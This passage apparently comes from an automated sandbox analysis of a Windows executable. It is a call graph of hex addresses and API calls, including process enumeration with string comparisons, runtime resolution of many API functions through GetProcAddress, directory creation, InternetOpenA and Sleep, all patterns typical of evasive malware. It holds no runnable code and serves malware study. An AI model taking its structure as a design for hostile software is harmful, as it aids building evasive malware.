14929 3069e6 14927->14929 14930 30672e 14928->14930 15892 2ff940 14929->15892 14932 2ff8f0 lstrcpy 14930->14932 14934 306737 14932->14934 14936 2ff9a0 3 API calls 14934->14936 14935 2ff8f0 lstrcpy 14939 3069f9 14935->14939 14937 306750 14936->14937 14938 2ff8f0 lstrcpy 14937->14938 14940 306759 14938->14940 14941 306a15 CreateDirectoryA 14939->14941 14942 2ff9a0 3 API calls 14940->14942 15896 2f1080 14941->15896 14944 306772 14942->14944 14946 2ff8f0 lstrcpy 14944->14946 14949 30677b 14946->14949 14948 306a39 14950 2ff8f0 lstrcpy 14948->14950 14953 2ff9a0 3 API calls 14949->14953 14951 306a4a 14950->14951 14952 2ff8f0 lstrcpy 14951->14952 14954 306a59 14952->14954 14955 306794 14953->14955 14956 2ff8f0 lstrcpy 14954->14956 14957 2ff8f0 lstrcpy 14955->14957 14963 306a68 14956->14963 14958 30679d 14957->14958 14959 2ff9a0 3 API calls 14958->14959 14960 3067b6 14959->14960 14961 2ff8f0 lstrcpy 14960->14961 14962 3067bf 14961->14962 14966 2ff9a0 3 API calls 14962->14966 14964 2ff8f0 lstrcpy 14963->14964 14965 306a9b 14964->14965 14967 2ff8f0 lstrcpy 14965->14967 14969 3067d8 14966->14969 14968 306aad 14967->14968 15996 2ff850 14968->15996 14971 2ff8f0 lstrcpy 14969->14971 14973 3067e1 14971->14973 14977 2ff9a0 3 API calls 14973->14977 14974 2ff9a0 3 API calls 14975 306ad3 14974->14975 14976 2ff8f0 lstrcpy 14975->14976 14978 306adf 14976->14978 14979 3067fa 14977->14979 14982 2ff940 2 API calls 14978->14982 14980 2ff8f0 lstrcpy 14979->14980 14981 306803 14980->14981 14984 2ff9a0 3 API calls 14981->14984 14983 306afd 14982->14983 14985 2ff8f0 lstrcpy 14983->14985 14986 30681c 14984->14986 14989 306b09 14985->14989 14987 2ff8f0 lstrcpy 14986->14987 14988 306825 14987->14988 14992 2ff9a0 3 API calls 14988->14992 14990 306b21 InternetOpenA 14989->14990 16000 2ffa50 14990->16000 14994 30683e 14992->14994 14993 306b3b InternetOpenA 14995 2ff850 lstrcpy 14993->14995 14996 2ff8f0 lstrcpy 14994->14996 14997 306b62 14995->14997 14998 306847 14996->14998 14999 2ff810 lstrcpy 14997->14999 15000 2ff9a0 3 API calls 14998->15000 15002 306b72 14999->15002 15001 306860 15000->15001 15003 2ff8f0 lstrcpy 15001->15003 16001 300420 GetWindowsDirectoryA 15002->16001 15005 306869 15003->15005 15009 2ff9a0 3 API calls 15005->15009 15006 306b7b 15007 2ff850 lstrcpy 15006->15007 15008 306b8c 15007->15008 16021 2f3e20 15008->16021 15011 306882 15009->15011 15013 2ff8f0 lstrcpy 15011->15013 15012 306b92 16158 3023f0 15012->16158 15016 30688b 15013->15016 15015 306b9a 15017 2ff810 lstrcpy 15015->15017 15019 2ff9a0 3 API calls 15016->15019 15018 306bc8 15017->15018 15020 2f1080 lstrcpy 15018->15020 15021 3068a4 15019->15021 15022 306bd9 15020->15022 15023 2ff8f0 lstrcpy 15021->15023 16178 2f5bb0 15022->16178 15025 3068ad 15023->15025 15028 2ff9a0 3 API calls 15025->15028 15026 306bdf 16357 301e60 15026->16357 15030 3068c6 15028->15030 15029 306be7 15031 2ff810 lstrcpy 15029->15031 15032 2ff8f0 lstrcpy 15030->15032 15033 306c09 15031->15033 15034 3068cf 15032->15034 15035 2f1080 lstrcpy 15033->15035 15039 2ff9a0 3 API calls 15034->15039 15036 306c1a 15035->15036 15037 2f5bb0 41 API calls 15036->15037 15038 306c20 15037->15038 16365 301c00 15038->16365 15041 3068e8 15039->15041 15043 2ff8f0 lstrcpy 15041->15043 15042 306c28 15044 2ff810 lstrcpy 15042->15044 15045 3068f1 15043->15045 15046 306c4a 15044->15046 15049 2ff9a0 3 API calls 15045->15049 15047 2f1080 lstrcpy 15046->15047 15048 306c5b 15047->15048 15050 2f5bb0 41 API calls 15048->15050 15051 30690a 15049->15051 15052 306c61 15050->15052 15053 2ff8f0 lstrcpy 15051->15053 16376 301d80 15052->16376 15054 306913 15053->15054 15058 2ff9a0 3 API calls 15054->15058 15056 306c69 15057 2f1080 lstrcpy 15056->15057 15059 306c7a 15057->15059 15060 30692c 15058->15060 16385 3044b0 15059->16385 15062 2ff8f0 lstrcpy 15060->15062 15064 306935 15062->15064 15063 306c7f 15065 2ff850 lstrcpy 15063->15065 15067 2ff9a0 3 API calls 15064->15067 15066 306c90 15065->15066 15068 2ff810 lstrcpy 15066->15068 15069 30694e 15067->15069 15070 306ca6 15068->15070 15071 2ff8f0 lstrcpy 15069->15071 16723 2f43e0 15070->16723 15076 306957 15071->15076 15073 306cab 15074 2f1080 lstrcpy 15073->15074 15075 306cf8 15074->15075 16743 2fe870 15075->16743 15878 301400 CreateToolhelp32Snapshot Process32First 15076->15878 15080 30696d 15080->15082 15883 30b220 15080->15883 15886 300b80 15082->15886 15287 2f209e 15286->15287 15288 2f2117 11 API calls 15286->15288 15289 2f20a6 11 API calls 15287->15289 15288->14797 15289->15288 15289->15289 15291 2ff8ba 15290->15291 15292 2ff8e8 15291->15292 15293 2ff8e0 lstrcpy 15291->15293 15292->14909 15293->15292 15295 2f2000 39 API calls 15294->15295 15296 2f2521 15295->15296 15297 2f2000 39 API calls 15296->15297 15298 2f2537 15297->15298 15299 2f2000 39 API calls 15298->15299 15300 2f254d 15299->15300 15301 2f2000 39 API calls 15300->15301 15302 2f2563 15301->15302 15303 2f2000 39 API calls 15302->15303 15304 2f2579 15303->15304 15305 2f2000 39 API calls 15304->15305 15306 2f258f 15305->15306 15307 2f2000 39 API calls 15306->15307 15308 2f25a8 15307->15308 15309 2f2000 39 API calls 15308->15309 15310 2f25be 15309->15310 15311 2f2000 39 API calls 15310->15311 15312 2f25d4 15311->15312 15313 2f2000 39 API calls 15312->15313 15314 2f25ea 15313->15314 15315 2f2000 39 API calls 15314->15315 15316 2f2600 15315->15316 15317 2f2000 39 API calls 15316->15317 15318 2f2616 15317->15318 15319 2f2000 39 API calls 15318->15319 15320 2f262f 15319->15320 15321 2f2000 39 API calls 15320->15321 15322 2f2645 15321->15322 15323 2f2000 39 API calls 15322->15323 15324 2f265b 15323->15324 15325 2f2000 39 API calls 15324->15325 15326 2f2671 15325->15326 15327 2f2000 39 API calls 15326->15327 15328 2f2687 15327->15328 15329 2f2000 39 API calls 15328->15329 15330 2f269d 15329->15330 15331 2f2000 39 API calls 15330->15331 15332 2f26b6 15331->15332 15333 2f2000 39 API calls 15332->15333 15334 2f26cc 15333->15334 15335 2f2000 39 API calls 15334->15335 15336 2f26e2 15335->15336 15337 2f2000 39 API calls 15336->15337 15338 2f26f8 15337->15338 15339 2f2000 39 API calls 15338->15339 15340 2f270e 15339->15340 15341 2f2000 39 API calls 15340->15341 15342 2f2724 15341->15342 15343 2f2000 39 API calls 15342->15343 15344 2f273d 15343->15344 15345 2f2000 39 API calls 15344->15345 15346 2f2753 15345->15346 15347 2f2000 39 API calls 15346->15347 15348 2f2769 15347->15348 15349 2f2000 39 API calls 15348->15349 15350 2f277f 15349->15350 15351 2f2000 39 API calls 15350->15351 15352 2f2795 15351->15352 15353 2f2000 39 API calls 15352->15353 15354 2f27ab 15353->15354 15355 2f2000 39 API calls 15354->15355 15356 2f27c4 15355->15356 15357 2f2000 39 API calls 15356->15357 15358 2f27da 15357->15358 15359 2f2000 39 API calls 15358->15359 15360 2f27f0 15359->15360 15361 2f2000 39 API calls 15360->15361 15362 2f2806 15361->15362 15363 2f2000 39 API calls 15362->15363 15364 2f281c 15363->15364 15365 2f2000 39 API calls 15364->15365 15366 2f2832 15365->15366 15367 2f2000 39 API calls 15366->15367 15368 2f284b 15367->15368 15369 2f2000 39 API calls 15368->15369 15370 2f2861 15369->15370 15371 2f2000 39 API calls 15370->15371 15372 2f2877 15371->15372 15373 2f2000 39 API calls 15372->15373 15374 2f288d 15373->15374 15375 2f2000 39 API calls 15374->15375 15376 2f28a3 15375->15376 15377 2f2000 39 API calls 15376->15377 15378 2f28b9 15377->15378 15379 2f2000 39 API calls 15378->15379 15380 2f28d2 15379->15380 15381 2f2000 39 API calls 15380->15381 15382 2f28e8 15381->15382 15383 2f2000 39 API calls 15382->15383 15384 2f28fe 15383->15384 15385 2f2000 39 API calls 15384->15385 15386 2f2914 15385->15386 15387 2f2000 39 API calls 15386->15387 15388 2f292a 15387->15388 15389 2f2000 39 API calls 15388->15389 15390 2f2940 15389->15390 15391 2f2000 39 API calls 15390->15391 15392 2f2959 15391->15392 15393 2f2000 39 API calls 15392->15393 15394 2f296f 15393->15394 15395 2f2000 39 API calls 15394->15395 15396 2f2985 15395->15396 15397 2f2000 39 API calls 15396->15397 15398 2f299b 15397->15398 15399 2f2000 39 API calls 15398->15399 15400 2f29b1 15399->15400 15401 2f2000 39 API calls 15400->15401 15402 2f29c7 15401->15402 15403 2f2000 39 API calls 15402->15403 15404 2f29e0 15403->15404 15405 2f2000 39 API calls 15404->15405 15406 2f29f6 15405->15406 15407 2f2000 39 API calls 15406->15407 15408 2f2a0c 15407->15408 15409 2f2000 39 API calls 15408->15409 15410 2f2a22 15409->15410 15411 2f2000 39 API calls 15410->15411 15412 2f2a38 15411->15412 15413 2f2000 39 API calls 15412->15413 15414 2f2a4e 15413->15414 15415 2f2000 39 API calls 15414->15415 15416 2f2a67 15415->15416 15417 2f2000 39 API calls 15416->15417 15418 2f2a7d 15417->15418 15419 2f2000 39 API calls 15418->15419 15420 2f2a93 15419->15420 15421 2f2000 39 API calls 15420->15421 15422 2f2aa9 15421->15422 15423 2f2000 39 API calls 15422->15423 15424 2f2abf 15423->15424 15425 2f2000 39 API calls 15424->15425 15426 2f2ad5 15425->15426 15427 2f2000 39 API calls 15426->15427 15428 2f2aee 15427->15428 15429 2f2000 39 API calls 15428->15429 15430 2f2b04 15429->15430 15431 2f2000 39 API calls 15430->15431 15432 2f2b1a 15431->15432 15433 2f2000 39 API calls 15432->15433 15434 2f2b30 15433->15434 15435 2f2000 39 API calls 15434->15435 15436 2f2b46 15435->15436 15437 2f2000 39 API calls 15436->15437 15438 2f2b5c 15437->15438 15439 2f2000 39 API calls 15438->15439 15440 2f2b75 15439->15440 15441 2f2000 39 API calls 15440->15441 15442 2f2b8b 15441->15442 15443 2f2000 39 API calls 15442->15443 15444 2f2ba1 15443->15444 15445 2f2000 39 API calls 15444->15445 15446 2f2bb7 15445->15446 15447 2f2000 39 API calls 15446->15447 15448 2f2bcd 15447->15448 15449 2f2000 39 API calls 15448->15449 15450 2f2be3 15449->15450 15451 2f2000 39 API calls 15450->15451 15452 2f2bfc 15451->15452 15453 2f2000 39 API calls 15452->15453 15454 2f2c12 15453->15454 15455 2f2000 39 API calls 15454->15455 15456 2f2c28 15455->15456 15457 2f2000 39 API calls 15456->15457 15458 2f2c3e 15457->15458 15459 2f2000 39 API calls 15458->15459 15460 2f2c54 15459->15460 15461 2f2000 39 API calls 15460->15461 15462 2f2c6a 15461->15462 15463 2f2000 39 API calls 15462->15463 15464 2f2c83 15463->15464 15465 2f2000 39 API calls 15464->15465 15466 2f2c99 15465->15466 15467 2f2000 39 API calls 15466->15467 15468 2f2caf 15467->15468 15469 2f2000 39 API calls 15468->15469 15470 2f2cc5 15469->15470 15471 2f2000 39 API calls 15470->15471 15472 2f2cdb 15471->15472 15473 2f2000 39 API calls 15472->15473 15474 2f2cf1 15473->15474 15475 2f2000 39 API calls 15474->15475 15476 2f2d0a 15475->15476 15477 2f2000 39 API calls 15476->15477 15478 2f2d20 15477->15478 15479 2f2000 39 API calls 15478->15479 15480 2f2d36 15479->15480 15481 2f2000 39 API calls 15480->15481 15482 2f2d4c 15481->15482 15483 2f2000 39 API calls 15482->15483 15484 2f2d62 15483->15484 15485 2f2000 39 API calls 15484->15485 15486 2f2d78 15485->15486 15487 2f2000 39 API calls 15486->15487 15488 2f2d91 15487->15488 15489 2f2000 39 API calls 15488->15489 15490 2f2da7 15489->15490 15491 2f2000 39 API calls 15490->15491 15492 2f2dbd 15491->15492 15493 2f2000 39 API calls 15492->15493 15494 2f2dd3 15493->15494 15495 2f2000 39 API calls 15494->15495 15496 2f2de9 15495->15496 15497 2f2000 39 API calls 15496->15497 15498 2f2dff 15497->15498 15499 2f2000 39 API calls 15498->15499 15500 2f2e18 15499->15500 15501 2f2000 39 API calls 15500->15501 15502 2f2e2e 15501->15502 15503 2f2000 39 API calls 15502->15503 15504 2f2e44 15503->15504 15505 2f2000 39 API calls 15504->15505 15506 2f2e5a 15505->15506 15507 2f2000 39 API calls 15506->15507 15508 2f2e70 15507->15508 15509 2f2000 39 API calls 15508->15509 15510 2f2e86 15509->15510 15511 2f2000 39 API calls 15510->15511 15512 2f2e9f 15511->15512 15513 2f2000 39 API calls 15512->15513 15514 2f2eb5 15513->15514 15515 2f2000 39 API calls 15514->15515 15516 2f2ecb 15515->15516 15517 2f2000 39 API calls 15516->15517 15518 2f2ee1 15517->15518 15519 2f2000 39 API calls 15518->15519 15520 2f2ef7 15519->15520 15521 2f2000 39 API calls 15520->15521 15522 2f2f0d 15521->15522 15523 2f2000 39 API calls 15522->15523 15524 2f2f26 15523->15524 15525 2f2000 39 API calls 15524->15525 15526 2f2f3c 15525->15526 15527 2f2000 39 API calls 15526->15527 15528 2f2f52 15527->15528 15529 2f2000 39 API calls 15528->15529 15530 2f2f68 15529->15530 15531 2f2000 39 API calls 15530->15531 15532 2f2f7e 15531->15532 15533 2f2000 39 API calls 15532->15533 15534 2f2f94 15533->15534 15535 2f2000 39 API calls 15534->15535 15536 2f2fad 15535->15536 15537 2f2000 39 API calls 15536->15537 15538 2f2fc3 15537->15538 15539 2f2000 39 API calls 15538->15539 15540 2f2fd9 15539->15540 15541 2f2000 39 API calls 15540->15541 15542 2f2fef 15541->15542 15543 2f2000 39 API calls 15542->15543 15544 2f3005 15543->15544 15545 2f2000 39 API calls 15544->15545 15546 2f301b 15545->15546 15547 2f2000 39 API calls 15546->15547 15548 2f3034 15547->15548 15549 2f2000 39 API calls 15548->15549 15550 2f304a 15549->15550 15551 2f2000 39 API calls 15550->15551 15552 2f3060 15551->15552 15553 2f2000 39 API calls 15552->15553 15554 2f3076 15553->15554 15555 2f2000 39 API calls 15554->15555 15556 2f308c 15555->15556 15557 2f2000 39 API calls 15556->15557 15558 2f30a2 15557->15558 15559 2f2000 39 API calls 15558->15559 15560 2f30bb 15559->15560 15561 2f2000 39 API calls 15560->15561 15562 2f30d1 15561->15562 15563 2f2000 39 API calls 15562->15563 15564 2f30e7 15563->15564 15565 2f2000 39 API calls 15564->15565 15566 2f30fd 15565->15566 15567 2f2000 39 API calls 15566->15567 15568 2f3113 15567->15568 15569 2f2000 39 API calls 15568->15569 15570 2f3129 15569->15570 15571 2f2000 39 API calls 15570->15571 15572 2f3142 15571->15572 15573 2f2000 39 API calls 15572->15573 15574 2f3158 15573->15574 15575 2f2000 39 API calls 15574->15575 15576 2f316e 15575->15576 15577 2f2000 39 API calls 15576->15577 15578 2f3184 15577->15578 15579 2f2000 39 API calls 15578->15579 15580 2f319a 15579->15580 15581 2f2000 39 API calls 15580->15581 15582 2f31b0 15581->15582 15583 2f2000 39 API calls 15582->15583 15584 2f31c9 15583->15584 15585 2f2000 39 API calls 15584->15585 15586 2f31df 15585->15586 15587 2f2000 39 API calls 15586->15587 15588 2f31f5 15587->15588 15589 2f2000 39 API calls 15588->15589 15590 2f320b 15589->15590 15591 2f2000 39 API calls 15590->15591 15592 2f3221 15591->15592 15593 2f2000 39 API calls 15592->15593 15594 2f3237 15593->15594 15595 2f2000 39 API calls 15594->15595 15596 2f3250 15595->15596 15597 2f2000 39 API calls 15596->15597 15598 2f3266 15597->15598 15599 2f2000 39 API calls 15598->15599 15600 2f327c 15599->15600 15601 2f2000 39 API calls 15600->15601 15602 2f3292 15601->15602 15603 2f2000 39 API calls 15602->15603 15604 2f32a8 15603->15604 15605 2f2000 39 API calls 15604->15605 15606 2f32be 15605->15606 15607 2f2000 39 API calls 15606->15607 15608 2f32d7 15607->15608 15609 2f2000 39 API calls 15608->15609 15610 2f32ed 15609->15610 15611 2f2000 39 API calls 15610->15611 15612 2f3303 15611->15612 15613 2f2000 39 API calls 15612->15613 15614 2f3319 15613->15614 15615 2f2000 39 API calls 15614->15615 15616 2f332f 15615->15616 15617 2f2000 39 API calls 15616->15617 15618 2f3345 15617->15618 15619 2f2000 39 API calls 15618->15619 15620 2f335e 15619->15620 15621 2f2000 39 API calls 15620->15621 15622 2f3374 15621->15622 15623 2f2000 39 API calls 15622->15623 15624 2f338a 15623->15624 15625 2f2000 39 API calls 15624->15625 15626 2f33a0 15625->15626 15627 2f2000 39 API calls 15626->15627 15628 2f33b6 15627->15628 15629 2f2000 39 API calls 15628->15629 15630 2f33cc 15629->15630 15631 2f2000 39 API calls 15630->15631 15632 2f33e5 15631->15632 15633 2f2000 39 API calls 15632->15633 15634 2f33fb 15633->15634 15635 2f2000 39 API calls 15634->15635 15636 2f3411 15635->15636 15637 2f2000 39 API calls 15636->15637 15638 2f3427 15637->15638 15639 2f2000 39 API calls 15638->15639 15640 2f343d 15639->15640 15641 2f2000 39 API calls 15640->15641 15642 2f3453 15641->15642 15643 2f2000 39 API calls 15642->15643 15644 2f346c 15643->15644 15645 2f2000 39 API calls 15644->15645 15646 2f3482 15645->15646 15647 2f2000 39 API calls 15646->15647 15648 2f3498 15647->15648 15649 2f2000 39 API calls 15648->15649 15650 2f34ae 15649->15650 15651 2f2000 39 API calls 15650->15651 15652 2f34c4 15651->15652 15653 2f2000 39 API calls 15652->15653 15654 2f34da 15653->15654 15655 2f2000 39 API calls 15654->15655 15656 2f34f3 15655->15656 15657 2f2000 39 API calls 15656->15657 15658 2f3509 15657->15658 15659 2f2000 39 API calls 15658->15659 15660 2f351f 15659->15660 15661 2f2000 39 API calls 15660->15661 15662 2f3535 15661->15662 15663 2f2000 39 API calls 15662->15663 15664 2f354b 15663->15664 15665 2f2000 39 API calls 15664->15665 15666 2f3561 15665->15666 15667 2f2000 39 API calls 15666->15667 15668 2f357a 15667->15668 15669 2f2000 39 API calls 15668->15669 15670 2f3590 15669->15670 15671 2f2000 39 API calls 15670->15671 15672 2f35a6 15671->15672 15673 2f2000 39 API calls 15672->15673 15674 2f35bc 15673->15674 15675 2f2000 39 API calls 15674->15675 15676 2f35d2 15675->15676 15677 2f2000 39 API calls 15676->15677 15678 2f35e8 15677->15678 15679 2f2000 39 API calls 15678->15679 15680 2f3601 15679->15680 15681 2f2000 39 API calls 15680->15681 15682 2f3617 15681->15682 15683 2f2000 39 API calls 15682->15683 15684 2f362d 15683->15684 15685 2f2000 39 API calls 15684->15685 15686 2f3643 15685->15686 15687 2f2000 39 API calls 15686->15687 15688 2f3659 15687->15688 15689 2f2000 39 API calls 15688->15689 15690 2f366f 15689->15690 15691 2f2000 39 API calls 15690->15691 15692 2f3688 15691->15692 15693 2f2000 39 API calls 15692->15693 15694 2f369e 15693->15694 15695 2f2000 39 API calls 15694->15695 15696 2f36b4 15695->15696 15697 2f2000 39 API calls 15696->15697 15698 2f36ca 15697->15698 15699 2f2000 39 API calls 15698->15699 15700 2f36e0 15699->15700 15701 2f2000 39 API calls 15700->15701 15702 2f36f6 15701->15702 15703 2f2000 39 API calls 15702->15703 15704 2f370f 15703->15704 15705 2f2000 39 API calls 15704->15705 15706 2f3725 15705->15706 15707 2f2000 39 API calls 15706->15707 15708 2f373b 15707->15708 15709 2f2000 39 API calls 15708->15709 15710 2f3751 15709->15710 15711 2f2000 39 API calls 15710->15711 15712 2f3767 15711->15712 15713 2f2000 39 API calls 15712->15713 15714 2f377d 15713->15714 15715 2f2000 39 API calls 15714->15715 15716 2f3796 15715->15716 15717 2f2000 39 API calls 15716->15717 15718 2f37ac 15717->15718 15719 2f2000 39 API calls 15718->15719 15720 2f37c2 15719->15720 15721 2f2000 39 API calls 15720->15721 15722 2f37d8 15721->15722 15723 2f2000 39 API calls 15722->15723 15724 2f37ee 15723->15724 15725 2f2000 39 API calls 15724->15725 15726 2f3804 15725->15726 15727 2f2000 39 API calls 15726->15727 15728 2f381d 15727->15728 15729 2f2000 39 API calls 15728->15729 15730 2f3833 15729->15730 15731 2f2000 39 API calls 15730->15731 15732 2f3849 15731->15732 15733 2f2000 39 API calls 15732->15733 15734 2f385f 15733->15734 15735 2f2000 39 API calls 15734->15735 15736 2f3875 15735->15736 15737 2f2000 39 API calls 15736->15737 15738 2f388b 15737->15738 15739 2f2000 39 API calls 15738->15739 15740 2f38a4 15739->15740 15741 2f2000 39 API calls 15740->15741 15742 2f38ba 15741->15742 15743 2f2000 39 API calls 15742->15743 15744 2f38d0 15743->15744 15745 2f2000 39 API calls 15744->15745 15746 2f38e6 15745->15746 15747 2f2000 39 API calls 15746->15747 15748 2f38fc 15747->15748 15749 2f2000 39 API calls 15748->15749 15750 2f3912 15749->15750 15751 2f2000 39 API calls 15750->15751 15752 2f392b 15751->15752 15753 2f2000 39 API calls 15752->15753 15754 2f3941 15753->15754 15755 2f2000 39 API calls 15754->15755 15756 2f3957 15755->15756 15757 2f2000 39 API calls 15756->15757 15758 2f396d 15757->15758 15759 2f2000 39 API calls 15758->15759 15760 2f3983 15759->15760 15761 2f2000 39 API calls 15760->15761 15762 2f3999 15761->15762 15763 2f2000 39 API calls 15762->15763 15764 2f39b2 15763->15764 15765 2f2000 39 API calls 15764->15765 15766 2f39c8 15765->15766 15767 2f2000 39 API calls 15766->15767 15768 2f39de 15767->15768 15769 2f2000 39 API calls 15768->15769 15770 2f39f4 15769->15770 15771 2f2000 39 API calls 15770->15771 15772 2f3a0a 15771->15772 15773 2f2000 39 API calls 15772->15773 15774 2f3a20 15773->15774 15775 2f2000 39 API calls 15774->15775 15776 2f3a39 15775->15776 15777 2f2000 39 API calls 15776->15777 15778 2f3a4f 15777->15778 15779 2f2000 39 API calls 15778->15779 15780 2f3a65 15779->15780 15781 2f2000 39 API calls 15780->15781 15782 2f3a7b 15781->15782 15783 2f2000 39 API calls 15782->15783 15784 2f3a91 15783->15784 15785 2f2000 39 API calls 15784->15785 15786 2f3aa7 15785->15786 15787 2f2000 39 API calls 15786->15787 15788 2f3ac0 15787->15788 15789 2f2000 39 API calls 15788->15789 15790 2f3ad6 15789->15790 15791 2f2000 39 API calls 15790->15791 15792 2f3aec 15791->15792 15793 2f2000 39 API calls 15792->15793 15794 2f3b02 15793->15794 15795 2f2000 39 API calls 15794->15795 15796 2f3b18 15795->15796 15797 2f2000 39 API calls 15796->15797 15798 2f3b2e 15797->15798 15799 2f2000 39 API calls 15798->15799 15800 2f3b47 15799->15800 15801 2f2000 39 API calls 15800->15801 15802 2f3b5d 15801->15802 15803 2f2000 39 API calls 15802->15803 15804 2f3b73 15803->15804 15805 2f2000 39 API calls 15804->15805 15806 2f3b89 15805->15806 15807 2f2000 39 API calls 15806->15807 15808 2f3b9f 15807->15808 15809 2f2000 39 API calls 15808->15809 15810 2f3bb5 15809->15810 15811 2f2000 39 API calls 15810->15811 15812 2f3bce 15811->15812 15813 2f2000 39 API calls 15812->15813 15814 2f3be4 15813->15814 15815 2f2000 39 API calls 15814->15815 15816 2f3bfa 15815->15816 15817 2f2000 39 API calls 15816->15817 15818 2f3c10 15817->15818 15819 2f2000 39 API calls 15818->15819 15820 2f3c26 15819->15820 15821 2f2000 39 API calls 15820->15821 15822 2f3c3c 15821->15822 15823 2f2000 39 API calls 15822->15823 15824 2f3c55 15823->15824 15825 2f2000 39 API calls 15824->15825 15826 2f3c6b 15825->15826 15827 2f2000 39 API calls 15826->15827 15828 2f3c81 15827->15828 15829 2f2000 39 API calls 15828->15829 15830 2f3c97 15829->15830 15831 2f2000 39 API calls 15830->15831 15832 2f3cad 15831->15832 15833 2f2000 39 API calls 15832->15833 15834 2f3cc3 15833->15834 15835 2f2000 39 API calls 15834->15835 15836 2f3cdc 15835->15836 15837 2f2000 39 API calls 15836->15837 15838 2f3cf2 15837->15838 15839 2f2000 39 API calls 15838->15839 15840 2f3d08 15839->15840 15841 2f2000 39 API calls 15840->15841 15842 2f3d1e 15841->15842 15843 2f2000 39 API calls 15842->15843 15844 2f3d34 15843->15844 15845 2f2000 39 API calls 15844->15845 15846 2f3d4a 15845->15846 15847 2f2000 39 API calls 15846->15847 15848 2f3d63 15847->15848 15849 307a40 15848->15849 15850 307efd 9 API calls 15849->15850 15851 307a4d 50 API calls 15849->15851 15852 307fa3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 15850->15852 15853 308017 15850->15853 15851->15850 15852->15853 15854 3080e1 15853->15854 15855 308024 8 API calls 15853->15855 15856 3080ea GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 15854->15856 15857 30815e 15854->15857 15855->15854 15856->15857 15858 3081f7 15857->15858 15859 30816b 6 API calls 15857->15859 15860 308204 9 API calls 15858->15860 15861 3082da 15858->15861 15859->15858 15860->15861 15862 3082e3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 15861->15862 15863 308357 15861->15863 15862->15863 15864 308360 GetProcAddress GetProcAddress 15863->15864 15865 30838b 15863->15865 15864->15865 15866 308394 GetProcAddress GetProcAddress 15865->15866 15867 3083bf 15865->15867 15866->15867 15868 3084b7 15867->15868 15869 3083cc 10 API calls 15867->15869 15870 3084c0 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 15868->15870 15871 30851c 15868->15871 15869->15868 15870->15871 15872 308525 GetProcAddress 15871->15872 15873 308538 15871->15873 15872->15873 15874 308541 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 15873->15874 15875 30859d 15873->15875 15874->15875 15876 3085a6 GetProcAddress 15875->15876 15877 3085b7 15875->15877 15876->15877 15877->14914 15879 301481 CloseHandle 15878->15879 15880 301453 Process32Next 15878->15880 15879->15080 15880->15879 15881 301465 StrCmpCA 15880->15881 15881->15880 15882 30147a 15881->15882 15882->15880 17248 30b170 15883->17248 15885 30b236 15885->15082 15887 2ff810 lstrcpy 15886->15887 15888 300b97 15887->15888 15889 2ff810 lstrcpy 15888->15889 15890 300ba5 GetSystemTime 15889->15890 15891 300bc3 15890->15891 15891->14918 15894 2ff96b 15892->15894 15893 2ff993 15893->14935 15894->15893 15895 2ff97f lstrcpy lstrcat 15894->15895 15895->15893 15897 2ff850 lstrcpy 15896->15897 15898 2f1090 15897->15898 15899 2ff850 lstrcpy 15898->15899 15900 2f109c 15899->15900 15901 2ff850 lstrcpy 15900->15901 15902 2f10a8 15901->15902 15903 2ff850 lstrcpy 15902->15903 15904 2f10c0 15903->15904 15905 3039e0 15904->15905 15906 3039f2 15905->15906 15907 2ff8a0 2 API calls 15906->15907 15908 303a0f 15907->15908 15909 2ff8a0 2 API calls 15908->15909 15910 303a1c 15909->15910 15911 2ff8a0 2 API calls 15910->15911 15912 303a29 15911->15912 15913 2ff810 lstrcpy 15912->15913 15914 303a36 15913->15914 15915 2ff810 lstrcpy 15914->15915 15916 303a43 15915->15916 15917 2ff810 lstrcpy 15916->15917 15918 303a50 15917->15918 15919 2ff810 lstrcpy 15918->15919 15920 303a5d 15919->15920 15921 2ff810 lstrcpy 15920->15921 15922 303a6a 15921->15922 15923 2ff810 lstrcpy 15922->15923 15995 303a77 15923->15995 15924 2f1ee0 lstrcpy 15924->15995 15925 2f1f00 lstrcpy 15925->15995 15926 302fa0 29 API calls 15926->15995 15927 2ff850 lstrcpy 15927->15995 15928 303b46 StrCmpCA 15928->15995 15929 303ba9 StrCmpCA 15930 3041b8 15929->15930 15929->15995 15931 2ff8f0 lstrcpy 15930->15931 15933 3041c4 15931->15933 15932 2f1080 lstrcpy 15932->15995 15934 2f1f00 lstrcpy 15933->15934 15935 3041cd 15934->15935 15937 2ff8f0 lstrcpy 15935->15937 15936 303cf2 StrCmpCA 15938 304184 15936->15938 15936->15995 15939 3041d9 15937->15939 15941 2ff8f0 lstrcpy 15938->15941 15946 2f1fc0 lstrcpy 15939->15946 15940 2f1f20 lstrcpy 15940->15995 15942 304190 15941->15942 17280 2f1f00 15942->17280 15943 2ff8f0 lstrcpy 15943->15995 15944 2f1f40 lstrcpy 15944->15995 15948 304114 15946->15948 15951 2ff8f0 lstrcpy 15948->15951 15949 303e3b StrCmpCA 15952 304150 15949->15952 15949->15995 15950 2ff8f0 lstrcpy 15953 3041a5 15950->15953 15954 3041f6 15951->15954 15955 2ff8f0 lstrcpy 15952->15955 17283 2f1fc0 15953->17283 15957 2ff850 lstrcpy 15954->15957 15956 30415c 15955->15956 15958 2f1f60 lstrcpy 15956->15958 15960 30420c 15957->15960 15961 304165 15958->15961 15963 2ff850 lstrcpy 15960->15963 15962 2ff8f0 lstrcpy 15961->15962 15965 304171 15962->15965 15966 304218 15963->15966 15964 303f84 StrCmpCA 15967 304119 15964->15967 15964->15995 15974 2f1fe0 lstrcpy 15965->15974 15969 2ff850 lstrcpy 15966->15969 15968 2ff8f0 lstrcpy 15967->15968 15971 304125 15968->15971 15994 304224 15969->15994 15970 303c8f StrCmpCA 15970->15995 15973 2f1f60 lstrcpy 15971->15973 15972 2f1f80 lstrcpy 15972->15995 15975 30412e 15973->15975 15974->15948 15977 2ff8f0 lstrcpy 15975->15977 15976 3040c7 StrCmpCA 15978 3040e2 15976->15978 15979 3040d2 Sleep 15976->15979 15980 30413a 15977->15980 15981 2ff8f0 lstrcpy 15978->15981 15979->15995 17277 2f1fe0 15980->17277 15982 3040ee 15981->15982 17274 2f1f60 15982->17274 15983 303dd8 StrCmpCA 15983->15995 15987 2ff8f0 lstrcpy 15988 304103 15987->15988 15990 2f1f60 lstrcpy 15988->15990 15989 303f21 StrCmpCA 15989->15995 15990->15948 15991 2f1f60 lstrcpy 15991->15995 15992 30406a StrCmpCA 15992->15995 15993 